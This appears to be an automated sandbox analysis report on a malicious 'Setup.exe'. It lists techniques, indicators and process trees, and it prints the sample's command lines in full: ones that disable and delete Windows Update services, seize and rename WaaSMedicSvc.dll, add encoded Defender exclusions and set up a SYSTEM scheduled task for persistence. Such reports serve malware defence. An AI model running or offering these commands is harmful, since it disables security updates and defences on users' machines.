c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf

General

Target

Setup.exe
Size

4.6MB
MD5

62ed80f638e9551e1e59b4ea9341bccd
SHA1

44196e8cb0f5774decf60e12215767f092c3c008
SHA256

c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
SHA512

56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Score

10^/10

discovery evasion exploit trojan

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Executes dropped EXE 3 IoCs

Processes:

iexplor.exeiexplore.exeiexplore.exe

pid process

4584 iexplor.exe
1844 iexplore.exe
4516 iexplore.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1436 takeown.exe
2456 icacls.exe
3408 takeown.exe
1088 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4584	iexplor.exe
1844	iexplore.exe
4516	iexplore.exe

pid	process
1436	takeown.exe
2456	icacls.exe
3408	takeown.exe
1088	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

iexplore.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	iexplore.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

1088 icacls.exe
1436 takeown.exe
2456 icacls.exe
3408 takeown.exe

pid	process
1088	icacls.exe
1436	takeown.exe
2456	icacls.exe
3408	takeown.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

iexplore.exeiexplore.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

35 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

iexplor.exe

description pid process target process

PID 4584 set thread context of 2164 4584 iexplor.exe AppLaunch.exe

flow	ioc
35	ip-api.com

description	pid	process	target process
PID 4584 set thread context of 2164	4584	iexplor.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

iexplore.exe

description	ioc	process
File created	C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe	iexplore.exe
File opened for modification	C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe	iexplore.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1712 schtasks.exe

pid	process
1712	schtasks.exe

Modifies data under HKEY_USERS 51 IoCs

Processes:

powershell.exeiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	iexplore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	iexplore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	iexplore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	iexplore.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
3344	reg.exe
2024	reg.exe
1748	reg.exe
2688	reg.exe
1284	reg.exe
4492	reg.exe
5076	reg.exe
3088	reg.exe
4960	reg.exe
2184	reg.exe
736	reg.exe
4928	reg.exe
4900	reg.exe
1440	reg.exe
3104	reg.exe
1464	reg.exe
640	reg.exe
1784	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeiexplore.exepowershell.exe

pid process

3980 powershell.exe
3980 powershell.exe
1844 iexplore.exe
1268 powershell.exe
1268 powershell.exe

pid	process
3980	powershell.exe
3980	powershell.exe
1844	iexplore.exe
1268	powershell.exe
1268	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exeAppLaunch.exeiexplore.exesc.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	2164	AppLaunch.exe
Token: SeDebugPrivilege	1844	iexplore.exe
Token: SeTakeOwnershipPrivilege	1436	sc.exe
Token: SeDebugPrivilege	1268	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exeiexplor.exeiexplore.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1004 wrote to memory of 4584	1004	Setup.exe	iexplor.exe
PID 1004 wrote to memory of 4584	1004	Setup.exe	iexplor.exe
PID 1004 wrote to memory of 4584	1004	Setup.exe	iexplor.exe
PID 4584 wrote to memory of 2164	4584	iexplor.exe	AppLaunch.exe
PID 4584 wrote to memory of 2164	4584	iexplor.exe	AppLaunch.exe
PID 4584 wrote to memory of 2164	4584	iexplor.exe	AppLaunch.exe
PID 4584 wrote to memory of 2164	4584	iexplor.exe	AppLaunch.exe
PID 4584 wrote to memory of 2164	4584	iexplor.exe	AppLaunch.exe
PID 1004 wrote to memory of 1844	1004	Setup.exe	iexplore.exe
PID 1004 wrote to memory of 1844	1004	Setup.exe	iexplore.exe
PID 1844 wrote to memory of 316	1844	iexplore.exe	cmd.exe
PID 1844 wrote to memory of 316	1844	iexplore.exe	cmd.exe
PID 316 wrote to memory of 3980	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 3980	316	cmd.exe	powershell.exe
PID 1844 wrote to memory of 4768	1844	iexplore.exe	cmd.exe
PID 1844 wrote to memory of 4768	1844	iexplore.exe	cmd.exe
PID 4768 wrote to memory of 3836	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3836	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3712	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3712	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3828	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3828	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 2248	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 2248	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 864	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 864	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 3104	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 3104	4768	cmd.exe	reg.exe
PID 1844 wrote to memory of 2720	1844	iexplore.exe	cmd.exe
PID 1844 wrote to memory of 2720	1844	iexplore.exe	cmd.exe
PID 4768 wrote to memory of 1284	4768	cmd.exe	Conhost.exe
PID 4768 wrote to memory of 1284	4768	cmd.exe	Conhost.exe
PID 4768 wrote to memory of 4960	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 4960	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 1464	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 1464	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 640	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 640	4768	cmd.exe	reg.exe
PID 2720 wrote to memory of 1712	2720	cmd.exe	schtasks.exe
PID 2720 wrote to memory of 1712	2720	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 1436	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 1436	4768	cmd.exe	sc.exe
PID 4768 wrote to memory of 1088	4768	cmd.exe	icacls.exe
PID 4768 wrote to memory of 1088	4768	cmd.exe	icacls.exe
PID 4768 wrote to memory of 3344	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 3344	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 3088	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 3088	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 5076	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 5076	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 4492	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 4492	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 2512	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 2512	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 1784	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 1784	4768	cmd.exe	reg.exe
PID 4768 wrote to memory of 3488	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 3488	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 4140	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 4140	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 1172	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 1172	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 2544	4768	cmd.exe	schtasks.exe
PID 4768 wrote to memory of 2544	4768	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1004

C:\Users\Admin\AppData\Local\Temp\iexplor.exe
C:\Users\Admin\AppData\Local\Temp\iexplor.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Users\Admin\AppData\Local\Temp\iexplore.exe
C:\Users\Admin\AppData\Local\Temp\iexplore.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:2512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:3488

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1784

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:2544

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1172

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4140

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4492

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:5076

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3088

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
3⤵
PID:2444

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:4612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
3⤵
PID:220

C:\Windows\system32\schtasks.exe
schtasks /run /tn "iexplore"
4⤵
PID:4424

C:\Windows\system32\sc.exe
sc stop bits
1⤵
PID:2248

C:\Windows\system32\sc.exe
sc stop wuauserv
1⤵
PID:3828

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
1⤵
- Modifies registry key
PID:3104

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
1⤵
- Modifies security service
- Modifies registry key
PID:4960

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
1⤵
- Modifies registry key
PID:1464

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1088

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
1⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1436

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
1⤵
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
1⤵
- Modifies registry key
PID:640

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
1⤵
- Modifies registry key
PID:1284

C:\Windows\system32\sc.exe
sc stop dosvc
1⤵
PID:864

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
1⤵
PID:3712

C:\Windows\system32\sc.exe
sc stop UsoSvc
1⤵
PID:3836

C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
"C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies data under HKEY_USERS
PID:4516

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
2⤵
PID:2472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
2⤵
PID:4736

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
PID:5080

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2456

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
3⤵
- Modifies registry key
PID:2184

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
3⤵
PID:4824

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
3⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
3⤵
PID:2544

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4364

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
3⤵
PID:2528

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
3⤵
PID:1512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
3⤵
PID:1444

C:\Windows\system32\reg.exe
